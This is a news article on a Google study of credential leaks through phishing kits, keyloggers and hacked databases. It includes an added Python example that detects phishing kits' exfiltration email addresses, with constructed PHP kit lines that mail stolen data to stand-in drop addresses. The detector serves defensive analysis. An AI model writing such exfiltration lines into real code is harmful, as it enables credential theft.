Google researchers and scientists have examined how login data leaks through phishing, hacked databases or keyloggers. Logins obtained through phishing pose the greatest risk to users.
Based on a case study of Google accounts, the authors write that 7 percent of victims in a hacked database reveal their Google password in this way. That percentage rises to 12 percent for keyloggers and to 25 percent for phishing. In addition, the criminals behind phishing and keyloggers in most cases record the user's IP address to facilitate use of the data. The study lasted a year and ran until March this year.
To conduct the study, the authors of the recently published paper used a dataset of 788,000 logins obtained by keyloggers, 12.4 million logins from phishing, and 1.9 billion logins from hacked databases. They obtained the dataset by building an automated tool that monitored open and closed forums, in addition to so-called paste sites and searches.
Method for collecting leaked login databases
Phishing logins were mapped using a dataset from an anonymous source with approximately 10,000 phishing kits and 3.8 million victims of these kits. These PHP and HTML kits send stolen logins to a specific email address. By analyzing the kits and automatically flagging these types of emails, the researchers were able to arrive at a total of 12.4 million messages containing stolen data.
Method for collecting data on phishing kits and keyloggers
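The kit analysis described above can be sketched as follows. This is an added example, not code from the paper or from Google: it assumes a simple regex pass over kit source that takes the first argument of PHP's `mail()` as the exfiltration point, and the kit fragments, addresses and message records are constructed.

```python
import re

EMAIL = r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"
# $var = "addr"; assignments, so mail($var, ...) can be resolved to an address
ASSIGN = re.compile(r"\$(\w+)\s*=\s*[\"'](" + EMAIL + r")[\"']\s*;")
# first argument of mail(): either a variable or a quoted literal address
MAIL_CALL = re.compile(r"\bmail\s*\(\s*(?:\$(\w+)|[\"'](" + EMAIL + r")[\"'])\s*,")

def exfil_addresses(php_source):
    """Return the addresses one kit file passes to mail() as recipient."""
    variables = {name: addr.lower() for name, addr in ASSIGN.findall(php_source)}
    found = set()
    for var, literal in MAIL_CALL.findall(php_source):
        if literal:
            found.add(literal.lower())
        elif var in variables:
            found.add(variables[var])
    return found

def flag_messages(messages, exfil_points):
    """Return the messages addressed to a known exfiltration point."""
    return [m for m in messages if m["to"].lower() in exfil_points]

# Constructed kit fragments: one uses a variable, one a literal recipient.
KIT_A = '''<?php
$recipient = "drop.one@example.com";
$unused = "webmaster@example.org";
mail($recipient, $subject, $message, $headers);
'''
KIT_B = '''<?php
@mail('Drop.Two@example.net', "Result", $data);
'''
# Constructed mail metadata records (hypothetical schema: id, to).
MESSAGES = [
    {"id": 1, "to": "drop.one@example.com"},
    {"id": 2, "to": "friend@example.org"},
    {"id": 3, "to": "DROP.TWO@example.net"},
    {"id": 4, "to": "webmaster@example.org"},
]

def demo():
    points = exfil_addresses(KIT_A) | exfil_addresses(KIT_B)
    return points, [m["id"] for m in flag_messages(MESSAGES, points)]

if __name__ == "__main__":
    print(demo())
```

An address that is assigned in a kit but never passed to `mail()` is not treated as an exfiltration point, which keeps contact or template addresses out of the flag list.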
The research also shows that the phishing kits with the most victims masquerade as login portals of Yahoo, Hotmail or Gmail. This is followed by kits that focus on a work-related login environment. Below that are storage services such as Dropbox and Google Drive. Another finding was that, in the case of phishing kits and keyloggers, the so-called exfiltration points, i.e. the email addresses to which the stolen data were sent, were most often accessed from Nigeria. The US also ranks high in both categories.
Victims in different categories